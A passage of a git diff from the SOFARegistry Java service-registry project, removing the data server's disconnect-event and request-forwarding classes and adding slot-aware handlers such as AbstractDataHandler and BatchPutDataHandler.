DataChangeEventCenter dataChangeEventCenter; - - @Autowired - private DataServerConfig dataServerConfig; - - /** - * receive disconnect event of client - * - * @param event - */ - public void receive(DisconnectEvent event) { - if (event.getType() == DisconnectTypeEnum.SESSION_SERVER) { - SessionServerDisconnectEvent sessionServerDisconnectEvent = (SessionServerDisconnectEvent) event; - LOGGER.info("receive session off event: sessionServerHost={}, processId={}", - sessionServerDisconnectEvent.getSessionServerHost(), - sessionServerDisconnectEvent.getProcessId()); - } - EVENT_QUEUE.add(event); - } - - @Override - public void afterPropertiesSet() { - LOGGER.info("begin start DisconnectEventHandler"); - Executor executor = ExecutorFactory - .newSingleThreadExecutor(DisconnectEventHandler.class.getSimpleName()); - executor.execute(() -> { - while (true) { - try { - DisconnectEvent disconnectEvent = EVENT_QUEUE.take(); - if (disconnectEvent.getType() == DisconnectTypeEnum.SESSION_SERVER) { - SessionServerDisconnectEvent event = (SessionServerDisconnectEvent) disconnectEvent; - String processId = event.getProcessId(); - //check processId confirm remove,and not be registered again when delay time - String sessionServerHost = event.getSessionServerHost(); - if (sessionServerConnectionFactory - .removeProcessIfMatch(processId, sessionServerHost)) { - Set clientHosts = sessionServerConnectionFactory - .removeClients(processId); - - LOGGER.info("session off is triggered: sessionServerHost={}, clientHost={}, processId={}", - sessionServerHost, - clientHosts, processId); - - if (clientHosts != null && !clientHosts.isEmpty()) { - for (String host : clientHosts) { - unPub(host, event.getRegisterTimestamp()); - } - } - } else { - LOGGER.info("session off is canceled: sessionServerHost={}, processId={}", - sessionServerHost, processId); - } - } else { - ClientDisconnectEvent event = (ClientDisconnectEvent) disconnectEvent; - unPub(event.getHost(), event.getRegisterTimestamp()); - } - } catch (Throwable e) { - LOGGER.error("handle client disconnect event failed", e); - } - } - }); - LOGGER.info("start DisconnectEventHandler success"); - } - - /** - * - * @param host - * @param registerTimestamp - */ - private void unPub(String host, long registerTimestamp) { - dataChangeEventCenter.onChange(new ClientChangeEvent(host, dataServerConfig - .getLocalDataCenter(), registerTimestamp)); - } -} \ No newline at end of file diff --git a/server/server/data/src/main/java/com/alipay/sofa/registry/server/data/remoting/sessionserver/disconnect/DisconnectTypeEnum.java b/server/server/data/src/main/java/com/alipay/sofa/registry/server/data/remoting/sessionserver/disconnect/DisconnectTypeEnum.java deleted file mode 100644 index 314ab870f..000000000 --- a/server/server/data/src/main/java/com/alipay/sofa/registry/server/data/remoting/sessionserver/disconnect/DisconnectTypeEnum.java +++ /dev/null @@ -1,29 +0,0 @@ -/* - * Licensed to the Apache Software Foundation (ASF) under one or more - * contributor license agreements. See the NOTICE file distributed with - * this work for additional information regarding copyright ownership. - * The ASF licenses this file to You under the Apache License, Version 2.0 - * (the "License"); you may not use this file except in compliance with - * the License. You may obtain a copy of the License at - * - * http://www.apache.org/licenses/LICENSE-2.0 - * - * Unless required by applicable law or agreed to in writing, software - * distributed under the License is distributed on an "AS IS" BASIS, - * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. - * See the License for the specific language governing permissions and - * limitations under the License. - */ -package com.alipay.sofa.registry.server.data.remoting.sessionserver.disconnect; - -/** - * - * @author qian.lqlq - * @version $Id: DisconnectTypeEnum.java, v 0.1 2018-04-15 14:58 qian.lqlq Exp $ - */ -public enum DisconnectTypeEnum { - /** */ - CLIENT, - /** */ - SESSION_SERVER -} \ No newline at end of file diff --git a/server/server/data/src/main/java/com/alipay/sofa/registry/server/data/remoting/sessionserver/disconnect/SessionServerDisconnectEvent.java b/server/server/data/src/main/java/com/alipay/sofa/registry/server/data/remoting/sessionserver/disconnect/SessionServerDisconnectEvent.java deleted file mode 100644 index be8bbaf6e..000000000 --- a/server/server/data/src/main/java/com/alipay/sofa/registry/server/data/remoting/sessionserver/disconnect/SessionServerDisconnectEvent.java +++ /dev/null @@ -1,62 +0,0 @@ -/* - * Licensed to the Apache Software Foundation (ASF) under one or more - * contributor license agreements. See the NOTICE file distributed with - * this work for additional information regarding copyright ownership. - * The ASF licenses this file to You under the Apache License, Version 2.0 - * (the "License"); you may not use this file except in compliance with - * the License. You may obtain a copy of the License at - * - * http://www.apache.org/licenses/LICENSE-2.0 - * - * Unless required by applicable law or agreed to in writing, software - * distributed under the License is distributed on an "AS IS" BASIS, - * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. - * See the License for the specific language governing permissions and - * limitations under the License. - */ -package com.alipay.sofa.registry.server.data.remoting.sessionserver.disconnect; - -/** - * - * @author qian.lqlq - * @version $Id: SessionServerDisconnectEvent.java, v 0.1 2018-04-14 18:22 qian.lqlq Exp $ - */ -public class SessionServerDisconnectEvent extends DisconnectEvent { - - private String processId; - - private String sessionServerHost; - - /** - * constructor - * @param processId - * @param timeoutMs - */ - public SessionServerDisconnectEvent(String processId, String sessionServerHost, int timeoutMs) { - this.processId = processId; - this.sessionServerHost = sessionServerHost; - setGmtOccur(System.currentTimeMillis()); - setRegisterTimestamp(getGmtOccur()); - setTimeoutMs(timeoutMs); - setType(DisconnectTypeEnum.SESSION_SERVER); - } - - /** - * Getter method for property processId. - * - * @return property value of processId - */ - public String getProcessId() { - return processId; - } - - /** - * Getter method for property sessionServerHost. - * - * @return property value of sessionServerHost - */ - public String getSessionServerHost() { - return sessionServerHost; - } - -} \ No newline at end of file diff --git a/server/server/data/src/main/java/com/alipay/sofa/registry/server/data/remoting/sessionserver/forward/ForwardService.java b/server/server/data/src/main/java/com/alipay/sofa/registry/server/data/remoting/sessionserver/forward/ForwardService.java deleted file mode 100644 index 43931d46c..000000000 --- a/server/server/data/src/main/java/com/alipay/sofa/registry/server/data/remoting/sessionserver/forward/ForwardService.java +++ /dev/null @@ -1,47 +0,0 @@ -/* - * Licensed to the Apache Software Foundation (ASF) under one or more - * contributor license agreements. See the NOTICE file distributed with - * this work for additional information regarding copyright ownership. - * The ASF licenses this file to You under the Apache License, Version 2.0 - * (the "License"); you may not use this file except in compliance with - * the License. You may obtain a copy of the License at - * - * http://www.apache.org/licenses/LICENSE-2.0 - * - * Unless required by applicable law or agreed to in writing, software - * distributed under the License is distributed on an "AS IS" BASIS, - * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. - * See the License for the specific language governing permissions and - * limitations under the License. - */ -package com.alipay.sofa.registry.server.data.remoting.sessionserver.forward; - -import com.alipay.remoting.exception.RemotingException; - -/** - * The interface Forward service. - * @author zhuoyu.sjw - * @version $Id : ForwardService.java, v 0.1 2018-06-16 17:41 zhuoyu.sjw Exp $$ - */ -public interface ForwardService { - - /** - * Need forward boolean. - * - * @param dataInfoId the data info id - * @return the boolean - */ - boolean needForward(String dataInfoId); - - /** - * Forward request object. - * - * @param dataInfoId the data info id - * @param request the request - * @return the object - * @throws RemotingException the remoting exception - * @throws InterruptedException the interrupted exception - */ - Object forwardRequest(String dataInfoId, Object request) throws RemotingException, - InterruptedException; -} diff --git a/server/server/data/src/main/java/com/alipay/sofa/registry/server/data/remoting/sessionserver/forward/ForwardServiceImpl.java b/server/server/data/src/main/java/com/alipay/sofa/registry/server/data/remoting/sessionserver/forward/ForwardServiceImpl.java deleted file mode 100644 index 7228bc03d..000000000 --- a/server/server/data/src/main/java/com/alipay/sofa/registry/server/data/remoting/sessionserver/forward/ForwardServiceImpl.java +++ /dev/null @@ -1,116 +0,0 @@ -/* - * Licensed to the Apache Software Foundation (ASF) under one or more - * contributor license agreements. See the NOTICE file distributed with - * this work for additional information regarding copyright ownership. - * The ASF licenses this file to You under the Apache License, Version 2.0 - * (the "License"); you may not use this file except in compliance with - * the License. You may obtain a copy of the License at - * - * http://www.apache.org/licenses/LICENSE-2.0 - * - * Unless required by applicable law or agreed to in writing, software - * distributed under the License is distributed on an "AS IS" BASIS, - * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. - * See the License for the specific language governing permissions and - * limitations under the License. - */ -package com.alipay.sofa.registry.server.data.remoting.sessionserver.forward; - -import com.alipay.remoting.exception.RemotingException; -import com.alipay.sofa.registry.common.model.store.URL; -import com.alipay.sofa.registry.log.Logger; -import com.alipay.sofa.registry.log.LoggerFactory; -import com.alipay.sofa.registry.net.NetUtil; -import com.alipay.sofa.registry.remoting.exchange.message.Request; -import com.alipay.sofa.registry.server.data.bootstrap.DataServerConfig; -import com.alipay.sofa.registry.server.data.node.DataNodeStatus; -import com.alipay.sofa.registry.server.data.node.DataServerNode; -import com.alipay.sofa.registry.server.data.remoting.DataNodeExchanger; -import com.alipay.sofa.registry.server.data.remoting.dataserver.DataServerNodeFactory; -import com.alipay.sofa.registry.server.data.util.LocalServerStatusEnum; -import org.springframework.beans.factory.annotation.Autowired; - -import java.util.List; - -/** - * The type Forward service. - * @author zhuoyu.sjw - * @version $Id : ForwardServiceImpl.java, v 0.1 2018-06-16 17:44 zhuoyu.sjw Exp $$ - */ -public class ForwardServiceImpl implements ForwardService { - - /** LOGGER */ - private static final Logger LOGGER = LoggerFactory.getLogger(ForwardServiceImpl.class); - - @Autowired - private DataServerConfig dataServerBootstrapConfig; - - @Autowired - private DataNodeStatus dataNodeStatus; - - @Autowired - private DataNodeExchanger dataNodeExchanger; - - /** - * @see ForwardService#needForward(String) - */ - @Override - public boolean needForward(String dataInfoId) { - return dataNodeStatus.getStatus() != LocalServerStatusEnum.WORKING; - } - - /** - * @see ForwardService#forwardRequest(String, Object) - */ - @Override - public Object forwardRequest(String dataInfoId, Object request) throws RemotingException { - try { - // 1. get store nodes - List dataServerNodes = DataServerNodeFactory.computeDataServerNodes( - dataServerBootstrapConfig.getLocalDataCenter(), dataInfoId, - dataServerBootstrapConfig.getStoreNodes()); - - // 2. find next node - if (null == dataServerNodes || dataServerNodes.size() <= 0) { - throw new RuntimeException("No available server to forward"); - } - - boolean next = false; - String localIp = NetUtil.getLocalAddress().getHostAddress(); - DataServerNode nextNode = null; - for (DataServerNode dataServerNode : dataServerNodes) { - if (next) { - nextNode = dataServerNode; - break; - } - if (null != localIp && localIp.equals(dataServerNode.getIp())) { - next = true; - } - } - - if (null == nextNode || null == nextNode.getConnection()) { - throw new RuntimeException("No available connection to forward"); - } - - LOGGER.info("[forward] target: {}, dataInfoId: {}, request: {}, allNodes: {}", - nextNode.getIp(), dataInfoId, request, dataServerNodes); - - // 3. invoke and return result - final DataServerNode finalNextNode = nextNode; - return dataNodeExchanger.request(new Request() { - @Override - public Object getRequestBody() { - return request; - } - - @Override - public URL getRequestUrl() { - return new URL(finalNextNode.getConnection().getRemoteIP(), finalNextNode - .getConnection().getRemotePort()); - } - }).getResult(); - } catch (Exception e) { - throw new RemotingException("ForwardServiceImpl forwardRequest error", e); - } - } -} diff --git a/server/server/data/src/main/java/com/alipay/sofa/registry/server/data/remoting/sessionserver/handler/AbstractDataHandler.java b/server/server/data/src/main/java/com/alipay/sofa/registry/server/data/remoting/sessionserver/handler/AbstractDataHandler.java new file mode 100644 index 000000000..c2fe4a00a --- /dev/null +++ b/server/server/data/src/main/java/com/alipay/sofa/registry/server/data/remoting/sessionserver/handler/AbstractDataHandler.java @@ -0,0 +1,144 @@ +/* + * Licensed to the Apache Software Foundation (ASF) under one or more + * contributor license agreements. See the NOTICE file distributed with + * this work for additional information regarding copyright ownership. + * The ASF licenses this file to You under the Apache License, Version 2.0 + * (the "License"); you may not use this file except in compliance with + * the License. You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.alipay.sofa.registry.server.data.remoting.sessionserver.handler; + +import com.alipay.remoting.Connection; +import com.alipay.sofa.registry.common.model.CommonResponse; +import com.alipay.sofa.registry.common.model.Node; +import com.alipay.sofa.registry.common.model.ProcessId; +import com.alipay.sofa.registry.common.model.PublishType; +import com.alipay.sofa.registry.common.model.constants.ValueConstants; +import com.alipay.sofa.registry.common.model.slot.SlotAccess; +import com.alipay.sofa.registry.common.model.slot.SlotAccessGenericResponse; +import com.alipay.sofa.registry.common.model.store.ProcessIdCache; +import com.alipay.sofa.registry.common.model.store.Publisher; +import com.alipay.sofa.registry.common.model.store.StoreData; +import com.alipay.sofa.registry.log.Logger; +import com.alipay.sofa.registry.log.LoggerFactory; +import com.alipay.sofa.registry.remoting.Channel; +import com.alipay.sofa.registry.remoting.bolt.BoltChannel; +import com.alipay.sofa.registry.server.data.bootstrap.DataServerConfig; +import com.alipay.sofa.registry.server.data.cache.DatumStorage; +import com.alipay.sofa.registry.server.data.change.DataChangeEventCenter; +import com.alipay.sofa.registry.server.data.lease.SessionLeaseManager; +import com.alipay.sofa.registry.server.data.slot.SlotManager; +import com.alipay.sofa.registry.server.shared.remoting.AbstractServerHandler; +import com.alipay.sofa.registry.util.ParaCheckUtil; +import com.google.common.collect.Sets; +import java.util.Collections; +import java.util.Set; +import org.springframework.beans.factory.annotation.Autowired; + +/** + * @author yuzhi.lyz + * @version v 0.1 2020-12-04 14:59 yuzhi.lyz Exp $ + */ +public abstract class AbstractDataHandler extends AbstractServerHandler { + private static final Logger LOGGER_SLOT_ACCESS = LoggerFactory.getLogger("SLOT-ACCESS"); + + private final Set DATA_TYPES = + Collections.unmodifiableSet( + Sets.newHashSet(StoreData.DataType.PUBLISHER, StoreData.DataType.UN_PUBLISHER)); + + @Autowired protected DataChangeEventCenter dataChangeEventCenter; + + @Autowired protected DataServerConfig dataServerConfig; + + @Autowired protected SlotManager slotManager; + + @Autowired protected DatumStorage localDatumStorage; + + @Autowired protected SessionLeaseManager sessionLeaseManager; + + protected void checkPublisher(Publisher publisher) { + ParaCheckUtil.checkNotNull(publisher, "publisher"); + ParaCheckUtil.checkNotBlank(publisher.getDataId(), "publisher.dataId"); + ParaCheckUtil.checkNotBlank(publisher.getInstanceId(), "publisher.instanceId"); + ParaCheckUtil.checkNotBlank(publisher.getGroup(), "publisher.group"); + ParaCheckUtil.checkNotBlank(publisher.getDataInfoId(), "publisher.dataInfoId"); + ParaCheckUtil.checkNotNull(publisher.getVersion(), "publisher.version"); + ParaCheckUtil.checkNotBlank(publisher.getRegisterId(), "publisher.registerId"); + if (publisher.getPublishType() != PublishType.TEMPORARY + && publisher.getDataType() == StoreData.DataType.PUBLISHER) { + ParaCheckUtil.checkNotNull(publisher.getSourceAddress(), "publisher.sourceAddress"); + } + ParaCheckUtil.checkContains(DATA_TYPES, publisher.getDataType(), "publisher.dataType"); + } + + protected void checkSessionProcessId(ProcessId sessionProcessId) { + ParaCheckUtil.checkNotNull(sessionProcessId, "request.sessionProcessId"); + } + + protected SlotAccess checkAccess(String dataInfoId, long slotTableEpoch, long slotLeaderEpoch) { + final int slotId = slotManager.slotOf(dataInfoId); + return checkAccess(slotId, slotTableEpoch, slotLeaderEpoch); + } + + protected SlotAccess checkAccess(int slotId, long slotTableEpoch, long slotLeaderEpoch) { + final SlotAccess slotAccess = + slotManager.checkSlotAccess(slotId, slotTableEpoch, slotLeaderEpoch); + if (slotAccess.isMoved()) { + LOGGER_SLOT_ACCESS.warn( + "[moved]{}, leaderEpoch={}, tableEpoch={}", slotAccess, slotLeaderEpoch, slotTableEpoch); + } + + if (slotAccess.isMigrating()) { + LOGGER_SLOT_ACCESS.warn( + "[migrating]{}, leaderEpoch={}, tableEpoch={}", + slotAccess, + slotLeaderEpoch, + slotTableEpoch); + } + if (slotAccess.isMisMatch()) { + LOGGER_SLOT_ACCESS.warn( + "[mismatch]{}, leaderEpoch={}, tableEpoch={}", + slotAccess, + slotLeaderEpoch, + slotTableEpoch); + } + return slotAccess; + } + + protected void processSessionProcessId(Channel channel, ProcessId sessionProcessId) { + // the channel is null when caller is xxx-Resource + if (channel != null) { + // bind the processId with the conn + sessionProcessId = ProcessIdCache.cache(sessionProcessId); + final Connection conn = ((BoltChannel) channel).getConnection(); + conn.setAttributeIfAbsent(ValueConstants.ATTR_RPC_CHANNEL_PROCESS_ID, sessionProcessId); + } + sessionLeaseManager.renewSession(sessionProcessId); + } + + @Override + public CommonResponse buildFailedResponse(String msg) { + return SlotAccessGenericResponse.failedResponse(msg); + } + + @Override + protected Node.NodeType getConnectNodeType() { + return Node.NodeType.SESSION; + } + + public static String getRemoteAddress(Channel channel) { + try { + return channel.getRemoteAddress().getAddress().getHostAddress(); + } catch (Throwable exception) { + return "unknown"; + } + } +} diff --git a/server/server/data/src/main/java/com/alipay/sofa/registry/server/data/remoting/sessionserver/handler/BatchPutDataHandler.java b/server/server/data/src/main/java/com/alipay/sofa/registry/server/data/remoting/sessionserver/handler/BatchPutDataHandler.java new file mode 100644 index 000000000..8755fab90 --- /dev/null +++ b/server/server/data/src/main/java/com/alipay/sofa/registry/server/data/remoting/sessionserver/handler/BatchPutDataHandler.java @@ -0,0 +1,168 @@ +/* + * Licensed to the Apache Software Foundation (ASF) under one or more + * contributor license agreements. See the NOTICE file distributed with + * this work for additional information regarding copyright ownership. + * The ASF licenses this file to You under the Apache License, Version 2.0 + * (the "License"); you may not use this file except in compliance with + * the License. You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.alipay.sofa.registry.server.data.remoting.sessionserver.handler; + +import com.alipay.sofa.registry.common.model.ProcessId; +import com.alipay.sofa.registry.common.model.PublishType; +import com.alipay.sofa.registry.common.model.RegisterVersion; +import com.alipay.sofa.registry.common.model.dataserver.BatchRequest; +import com.alipay.sofa.registry.common.model.dataserver.ClientOffPublisher; +import com.alipay.sofa.registry.common.model.dataserver.DatumVersion; +import com.alipay.sofa.registry.common.model.slot.SlotAccess; +import com.alipay.sofa.registry.common.model.slot.SlotAccessGenericResponse; +import com.alipay.sofa.registry.common.model.store.Publisher; +import com.alipay.sofa.registry.common.model.store.UnPublisher; +import com.alipay.sofa.registry.log.Logger; +import com.alipay.sofa.registry.log.LoggerFactory; +import com.alipay.sofa.registry.remoting.Channel; +import com.alipay.sofa.registry.util.ParaCheckUtil; +import com.google.common.collect.Sets; +import java.util.*; +import java.util.concurrent.Executor; +import java.util.concurrent.ThreadPoolExecutor; +import org.springframework.beans.factory.annotation.Autowired; + +public class BatchPutDataHandler extends AbstractDataHandler { + private static final Logger LOGGER = LoggerFactory.getLogger("PUT"); + @Autowired private ThreadPoolExecutor publishProcessorExecutor; + + @Override + public void checkParam(BatchRequest request) { + checkSessionProcessId(request.getSessionProcessId()); + for (Object req : request.getRequest()) { + if (req instanceof Publisher) { + checkPublisher((Publisher) req); + } else if (req instanceof ClientOffPublisher) { + ParaCheckUtil.checkNotNull( + ((ClientOffPublisher) req).getConnectId(), "ClientOffPublisher.connectId"); + ParaCheckUtil.checkNotNull( + ((ClientOffPublisher) req).getPublisherMap(), "ClientOffPublisher.publisherMap"); + } else { + throw new IllegalArgumentException("unsupported item in batch:" + req); + } + } + } + + @Override + public Object doHandle(Channel channel, BatchRequest request) { + final ProcessId sessionProcessId = request.getSessionProcessId(); + processSessionProcessId(channel, sessionProcessId); + final String remoteAddress = getRemoteAddress(channel); + final SlotAccess slotAccess = + checkAccess(request.getSlotId(), request.getSlotTableEpoch(), request.getSlotLeaderEpoch()); + if (slotAccess.isMoved() || slotAccess.isMisMatch()) { + // only reject the when moved + return SlotAccessGenericResponse.failedResponse(slotAccess); + } + final String slotIdStr = String.valueOf(request.getSlotId()); + final Set changeDataInfoIds = Sets.newHashSetWithExpectedSize(128); + try { + for (Object req : request.getRequest()) { + // contains publisher and unPublisher + if (req instanceof Publisher) { + Publisher publisher = (Publisher) req; + changeDataInfoIds.addAll(doHandle(publisher)); + if (publisher instanceof UnPublisher) { + LOGGER.info( + "unpub,{},{},{},{},{},{}", + slotIdStr, + publisher.getDataInfoId(), + publisher.getRegisterId(), + publisher.getVersion(), + publisher.getRegisterTimestamp(), + remoteAddress); + } else { + LOGGER.info( + "pub,{},{},{},{},{},{}", + slotIdStr, + publisher.getDataInfoId(), + publisher.getRegisterId(), + publisher.getVersion(), + publisher.getRegisterTimestamp(), + remoteAddress); + } + } else if (req instanceof ClientOffPublisher) { + ClientOffPublisher clientOff = (ClientOffPublisher) req; + changeDataInfoIds.addAll(doHandle(clientOff, sessionProcessId)); + for (Map.Entry> e : + clientOff.getPublisherMap().entrySet()) { + final String dataInfoId = e.getKey(); + for (Map.Entry ver : e.getValue().entrySet()) { + RegisterVersion version = ver.getValue(); + LOGGER.info( + "off,{},{},{},{},{},{}", + slotIdStr, + dataInfoId, + ver.getKey(), + version.getVersion(), + version.getRegisterTimestamp(), + remoteAddress); + } + } + } else { + throw new IllegalArgumentException("unsupported item in batch:" + req); + } + } + } finally { + // if has exception, try to notify the req which was handled + if (!changeDataInfoIds.isEmpty()) { + dataChangeEventCenter.onChange(changeDataInfoIds, dataServerConfig.getLocalDataCenter()); + } + } + + return SlotAccessGenericResponse.successResponse(slotAccess, null); + } + + private List doHandle(Publisher publisher) { + publisher = Publisher.internPublisher(publisher); + if (publisher.getPublishType() == PublishType.TEMPORARY) { + // create datum for the temp publisher, we need the datum.version for check ver + localDatumStorage.createEmptyDatumIfAbsent( + publisher.getDataInfoId(), dataServerConfig.getLocalDataCenter()); + // temporary only notify session, not store + dataChangeEventCenter.onTempPubChange(publisher, dataServerConfig.getLocalDataCenter()); + } else { + DatumVersion version = localDatumStorage.put(publisher); + if (version != null) { + return Collections.singletonList(publisher.getDataInfoId()); + } + } + return Collections.emptyList(); + } + + public List doHandle(ClientOffPublisher request, ProcessId sessionProcessId) { + Map> publisherMap = request.getPublisherMap(); + List dataInfoIds = new ArrayList<>(publisherMap.size()); + for (Map.Entry> e : publisherMap.entrySet()) { + DatumVersion version = localDatumStorage.remove(e.getKey(), sessionProcessId, e.getValue()); + if (version != null) { + dataInfoIds.add(e.getKey()); + } + } + return dataInfoIds; + } + + @Override + public Class interest() { + return BatchRequest.class; + } + + @Override + public Executor getExecutor() { + return publishProcessorExecutor; + } +} diff --git a/server/server/data/src/main/java/com/alipay/sofa/registry/server/data/remoting/sessionserver/handler/ClientOffHandler.java b/server/server/data/src/main/java/com/alipay/sofa/registry/server/data/remoting/sessionserver/handler/ClientOffHandler.java deleted file mode 100644 index 2ebd53d7f..000000000 --- a/server/server/data/src/main/java/com/alipay/sofa/registry/server/data/remoting/sessionserver/handler/ClientOffHandler.java +++ /dev/null @@ -1,80 +0,0 @@ -/* - * Licensed to the Apache Software Foundation (ASF) under one or more - * contributor license agreements. See the NOTICE file distributed with - * this work for additional information regarding copyright ownership. - * The ASF licenses this file to You under the Apache License, Version 2.0 - * (the "License"); you may not use this file except in compliance with - * the License. You may obtain a copy of the License at - * - * http://www.apache.org/licenses/LICENSE-2.0 - * - * Unless required by applicable law or agreed to in writing, software - * distributed under the License is distributed on an "AS IS" BASIS, - * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. - * See the License for the specific language governing permissions and - * limitations under the License. - */ -package com.alipay.sofa.registry.server.data.remoting.sessionserver.handler; - -import com.alipay.sofa.registry.common.model.CommonResponse; -import com.alipay.sofa.registry.common.model.Node; -import com.alipay.sofa.registry.common.model.dataserver.ClientOffRequest; -import com.alipay.sofa.registry.remoting.Channel; -import com.alipay.sofa.registry.server.data.bootstrap.DataServerConfig; -import com.alipay.sofa.registry.server.data.remoting.handler.AbstractServerHandler; -import com.alipay.sofa.registry.server.data.remoting.sessionserver.disconnect.ClientDisconnectEvent; -import com.alipay.sofa.registry.server.data.remoting.sessionserver.disconnect.DisconnectEventHandler; -import com.alipay.sofa.registry.util.ParaCheckUtil; -import org.springframework.beans.factory.annotation.Autowired; - -import java.util.List; - -/** - * processor to remove data of specific clients immediately - * - * @author qian.lqlq - * @version $Id: ClientOffProcessor.java, v 0.1 2017-12-01 15:48 qian.lqlq Exp $ - */ -public class ClientOffHandler extends AbstractServerHandler { - - @Autowired - private DataServerConfig dataServerBootstrapConfig; - - @Autowired - private DisconnectEventHandler disconnectEventHandler; - - @Override - public void checkParam(ClientOffRequest request) throws RuntimeException { - ParaCheckUtil.checkNotEmpty(request.getHosts(), "ClientOffRequest.hosts"); - } - - @Override - public Object doHandle(Channel channel, ClientOffRequest request) { - List hosts = request.getHosts(); - for (String host : hosts) { - disconnectEventHandler.receive(new ClientDisconnectEvent(host, request.getGmtOccur(), - dataServerBootstrapConfig.getClientOffDelayMs() * 10)); - } - return CommonResponse.buildSuccessResponse(); - } - - @Override - public CommonResponse buildFailedResponse(String msg) { - return CommonResponse.buildFailedResponse(msg); - } - - @Override - public HandlerType getType() { - return HandlerType.PROCESSER; - } - - @Override - public Class interest() { - return ClientOffRequest.class; - } - - @Override - protected Node.NodeType getConnectNodeType() { - return Node.NodeType.DATA; - } -} diff --git a/server/server/data/src/main/java/com/alipay/sofa/registry/server/data/remoting/sessionserver/handler/DataServerConnectionHandler.java b/server/server/data/src/main/java/com/alipay/sofa/registry/server/data/remoting/sessionserver/handler/DataServerConnectionHandler.java deleted file mode 100644 index 6f41e1f95..000000000 --- a/server/server/data/src/main/java/com/alipay/sofa/registry/server/data/remoting/sessionserver/handler/DataServerConnectionHandler.java +++ /dev/null @@ -1,71 +0,0 @@ -/* - * Licensed to the Apache Software Foundation (ASF) under one or more - * contributor license agreements. See the NOTICE file distributed with - * this work for additional information regarding copyright ownership. - * The ASF licenses this file to You under the Apache License, Version 2.0 - * (the "License"); you may not use this file except in compliance with - * the License. You may obtain a copy of the License at - * - * http://www.apache.org/licenses/LICENSE-2.0 - * - * Unless required by applicable law or agreed to in writing, software - * distributed under the License is distributed on an "AS IS" BASIS, - * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. - * See the License for the specific language governing permissions and - * limitations under the License. - */ -package com.alipay.sofa.registry.server.data.remoting.sessionserver.handler; - -import com.alipay.sofa.registry.common.model.Node; -import com.alipay.sofa.registry.net.NetUtil; -import com.alipay.sofa.registry.remoting.Channel; -import com.alipay.sofa.registry.remoting.ChannelHandler; -import com.alipay.sofa.registry.remoting.RemotingException; -import com.alipay.sofa.registry.server.data.remoting.handler.AbstractServerHandler; -import com.alipay.sofa.registry.server.data.remoting.sessionserver.SessionServerConnectionFactory; -import org.springframework.beans.factory.annotation.Autowired; - -/** - * @author xuanbei - * @since 2019/2/15 - */ -public class DataServerConnectionHandler extends AbstractServerHandler { - @Autowired - private SessionServerConnectionFactory sessionServerConnectionFactory; - - @Override - public ChannelHandler.HandlerType getType() { - return ChannelHandler.HandlerType.LISENTER; - } - - @Override - public void connected(Channel channel) throws RemotingException { - super.connected(channel); - } - - @Override - public void disconnected(Channel channel) throws RemotingException { - super.disconnected(channel); - sessionServerConnectionFactory.removeProcess(NetUtil.toAddressString(channel - .getRemoteAddress())); - } - - @Override - protected Node.NodeType getConnectNodeType() { - return Node.NodeType.DATA; - } - - @Override - public void checkParam(Object request) throws RuntimeException { - } - - @Override - public Object doHandle(Channel channel, Object request) { - return null; - } - - @Override - public Object buildFailedResponse(String msg) { - return null; - } -} diff --git a/server/server/data/src/main/java/com/alipay/sofa/registry/server/data/remoting/sessionserver/handler/GetDataHandler.java b/server/server/data/src/main/java/com/alipay/sofa/registry/server/data/remoting/sessionserver/handler/GetDataHandler.java index 76682983e..3b4d56905 100644 --- a/server/server/data/src/main/java/com/alipay/sofa/registry/server/data/remoting/sessionserver/handler/GetDataHandler.java +++ b/server/server/data/src/main/java/com/alipay/sofa/registry/server/data/remoting/sessionserver/handler/GetDataHandler.java @@ -16,27 +16,23 @@ */ package com.alipay.sofa.registry.server.data.remoting.sessionserver.handler; -import com.alipay.sofa.registry.common.model.GenericResponse; -import com.alipay.sofa.registry.common.model.Node; +import static com.alipay.sofa.registry.server.data.remoting.sessionserver.handler.HandlerMetrics.GetData.*; + import com.alipay.sofa.registry.common.model.dataserver.Datum; import com.alipay.sofa.registry.common.model.dataserver.GetDataRequest; +import com.alipay.sofa.registry.common.model.slot.SlotAccess; +import com.alipay.sofa.registry.common.model.slot.SlotAccessGenericResponse; +import com.alipay.sofa.registry.common.model.store.SubDatum; import com.alipay.sofa.registry.log.Logger; import com.alipay.sofa.registry.log.LoggerFactory; import com.alipay.sofa.registry.remoting.Channel; -import com.alipay.sofa.registry.server.data.bootstrap.DataServerConfig; import com.alipay.sofa.registry.server.data.cache.DatumCache; -import com.alipay.sofa.registry.server.data.remoting.handler.AbstractServerHandler; -import com.alipay.sofa.registry.server.data.remoting.sessionserver.forward.ForwardService; -import com.alipay.sofa.registry.server.data.util.ThreadPoolExecutorDataServer; -import com.alipay.sofa.registry.util.NamedThreadFactory; +import com.alipay.sofa.registry.server.shared.util.DatumUtils; import com.alipay.sofa.registry.util.ParaCheckUtil; -import org.springframework.beans.factory.annotation.Autowired; - -import java.util.Map; -import java.util.concurrent.ArrayBlockingQueue; +import com.google.common.annotations.VisibleForTesting; import java.util.concurrent.Executor; import java.util.concurrent.ThreadPoolExecutor; -import java.util.concurrent.TimeUnit; +import org.springframework.beans.factory.annotation.Autowired; /** * processor to get specific data @@ -44,73 +40,83 @@ * @author qian.lqlq * @version $Id: GetDataProcessor.java, v 0.1 2017-12-01 15:48 qian.lqlq Exp $ */ -public class GetDataHandler extends AbstractServerHandler { - - /** LOGGER */ - private static final Logger LOGGER = LoggerFactory.getLogger(GetDataHandler.class); - @Autowired - private ForwardService forwardService; +public class GetDataHandler extends AbstractDataHandler { + private static final Logger LOGGER = LoggerFactory.getLogger("GET"); + @Autowired private DatumCache datumCache; - @Autowired - private DataServerConfig dataServerBootstrapConfig; + @Autowired private ThreadPoolExecutor 